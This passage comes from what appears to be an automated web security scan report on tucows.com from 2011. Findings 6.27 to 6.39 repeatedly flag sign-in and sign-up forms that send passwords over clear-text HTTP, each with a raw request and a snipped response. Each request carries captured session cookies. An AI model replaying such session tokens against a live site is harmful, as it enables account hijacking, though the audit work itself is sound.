<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.27. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.28. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.29. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.30. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.31. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.32. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.33. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.34. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.35. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.36. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.37. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.38. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.39. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

